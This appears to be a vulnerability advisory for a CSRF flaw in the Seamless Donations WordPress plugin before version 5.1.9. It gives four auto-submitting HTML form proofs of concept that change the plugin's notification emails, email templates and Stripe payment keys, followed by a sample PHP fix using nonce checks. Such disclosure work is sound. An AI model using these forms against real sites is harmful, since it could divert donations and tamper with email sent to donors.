WordPress Plugin Vulnerabilities
Seamless Donations < 5.1.9 - Arbitrary Settings Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="seamless_donations_tab_templates">
  <input type="text" name="seamless_donations_template_email_test" value="evil@example.com">
  <input type="text" name="dgx_donate_button_settings_templates_test_email" value="Send Test Email">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="seamless_donations_tab_templates">
  <input type="text" name="seamless_donations_template_email_test" value="">
  <input type="text" name="dgx_donate_email_name" value="testuserhacked">
  <input type="text" name="dgx_donate_email_reply" value="test@example.com">
  <input type="text" name="dgx_donate_email_subj" value="Thank you for your donation">
  <input type="text" name="dgx_donate_email_body" value="hacked">
  <textarea type="text" name="dgx_donate_email_recur"> Some link: https://google.com </textarea>
  <input type="text" name="dgx_donate_email_desig" value="Your donation has been designated to the [fund] fund.">
  <input type="text" name="dgx_donate_email_anon" value="You have requested that your donation be kept anonymous. Your name will not be revealed to the public.">
  <input type="text" name="dgx_donate_email_list" value="Thank you for joining our mailing list. We will send you updates from time-to-time. If at any time you would like to stop receiving emails, please send us an email to be removed from the mailing list.">
  <input type="text" name="dgx_donate_email_empl" value="You have specified that your employer matches some or all of your donation.">
  <input type="text" name="dgx_donate_email_trib" value="You have asked to make this donation in honor of or memory of someone else. Thank you! We will notify the honoree within the next 5-10 business days.">
  <input type="text" name="dgx_donate_email_close" value="Thanks again for your support!">
  <input type="text" name="dgx_donate_email_sig" value="Director of Donor Relations">
  <input type="text" name="dgx_donate_button_template_settings" value="Save Changes">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="seamless_donations_tab_settings">
  <input type="text" name="dgx_donate_organization_name" value="uuuu">
  <input type="text" name="dgx_donate_notify_emails" value="test@example.com">
  <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
  <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
  <input type="text" name="dgx_donate_button_settings_basics" value="Save Basic Settings">
  <input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
  <input type="text" name="dgx_donate_live_stripe_api_key" value="">
  <input type="text" name="dgx_donate_live_stripe_secret_key" value="">
  <input type="text" name="dgx_donate_test_stripe_api_key" value="">
  <input type="text" name="dgx_donate_test_stripe_secret_key" value="">
  <input type="text" name="dgx_donate_stripe_billing_address" value="auto">
  <input type="text" name="dgx_donate_debug_mode" value="OFF">
  <input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="seamless_donations_tab_settings">
  <input type="text" name="dgx_donate_organization_name" value="uuuu">
  <input type="text" name="dgx_donate_notify_emails" value="test@example.com">
  <input type="text" name="dgx_donate_payment_processor_choice" value="STRIPE">
  <input type="text" name="dgx_donate_donor_fee_payment" value="NEVER">
  <input type="text" name="dgx_donate_button_stripe_settings" value="Update Stripe API Key">
  <input type="text" name="dgx_donate_stripe_server" value="SANDBOX">
  <input type="text" name="dgx_donate_live_stripe_api_key" value="pk_live_www">
  <input type="text" name="dgx_donate_live_stripe_secret_key" value="sk_live_www">
  <input type="text" name="dgx_donate_test_stripe_api_key" value="pk_test_www">
  <input type="text" name="dgx_donate_test_stripe_secret_key" value="sk_test_www">
  <input type="text" name="dgx_donate_stripe_billing_address" value="auto">
  <input type="text" name="dgx_donate_debug_mode" value="OFF">
  <input type="text" name="dgx_donate_log_obscure_name" value="on">
</form>
<script>
  document.getElementById("test").submit();
</script>
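The missing check, shown as an added example of a settings form and handler that carry and verify a WordPress nonce. This is not the plugin's own code or its 5.1.9 fix: the `example_` functions, the nonce action and field names, and the assumption that `dgx_donate_notify_emails` is stored as an option of the same name are hypothetical. Only the `admin-post.php` action and field name are taken from the proof of concept above.

```php
<?php
// Added example, not the plugin's code. Names prefixed example_/EXAMPLE_ are
// hypothetical; the admin-post action and field name come from the PoC above.

const EXAMPLE_NONCE_ACTION = 'example_sd_save_settings';
const EXAMPLE_NONCE_FIELD  = 'example_sd_nonce';

// Render side: the settings form carries a nonce bound to the current user
// and to this specific action.
function example_sd_render_settings_form() {
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" method="post">
        <input type="hidden" name="action" value="seamless_donations_tab_settings">
        <?php wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD ); ?>
        <input type="text" name="dgx_donate_notify_emails"
               value="<?php echo esc_attr( get_option( 'dgx_donate_notify_emails', '' ) ); ?>">
        <?php submit_button( 'Save Basic Settings' ); ?>
    </form>
    <?php
}

// Handler side: reject the request before any option is written.
function example_sd_handle_settings_post() {
    // Capability check: the admin_post_ hook only guarantees a logged-in user.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // Nonce check: stops with a 403 when the field is missing or invalid,
    // which is the case for a form auto-submitted from another origin.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    // Assumption: the setting is stored as an option named after the field.
    $emails = isset( $_POST['dgx_donate_notify_emails'] )
        ? sanitize_text_field( wp_unslash( $_POST['dgx_donate_notify_emails'] ) )
        : '';
    update_option( 'dgx_donate_notify_emails', $emails );

    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}
add_action( 'admin_post_seamless_donations_tab_settings', 'example_sd_handle_settings_post' );
```

With this check in place, a request whose body contains only the setting fields, with no valid nonce for the logged-in admin, is rejected before `update_option()` runs.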
Classification
Type: CSRF
Miscellaneous
Original Researcher: Daniel Ruf
Submitter: Daniel Ruf
Verified: Yes
Timeline
Publicly Published: 2022-05-26
Added: 2022-05-26
Last Updated: 2023-02-21